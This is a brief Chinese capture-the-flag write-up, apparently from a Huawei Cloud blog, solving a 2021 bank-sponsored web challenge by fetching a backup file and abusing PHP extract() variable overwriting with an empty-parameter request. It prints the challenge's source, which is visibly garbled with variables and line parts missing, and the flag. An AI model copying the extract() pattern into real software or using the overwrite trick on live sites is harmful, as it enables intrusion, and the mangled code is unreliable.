2021-10-11 网络安全(交通银行杯)-WEB安全(测试题)-网站信息
【摘要】 网络安全
一:题目
输入:http://1.117.248.182:8081/info.bak
得到php源码备份文件
`<?php
echo “where is bak\n”;
filename=__FILE__; flag = “想啥呢,怎么可能那么白给,提示:extract_bug”;
extract(
shiyan)){
filename));
if(
content) { echo $flag; }
else{ echo’Oh.no’;} }
?>`
输入地址:http://1.117.248.182:8081/info.php?shiyan=&filename=
得到flag:L@>M5X%N6i1Z5oZ1z7%0q_pgw6L@Qezp
【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
作者其他文章
评论(0)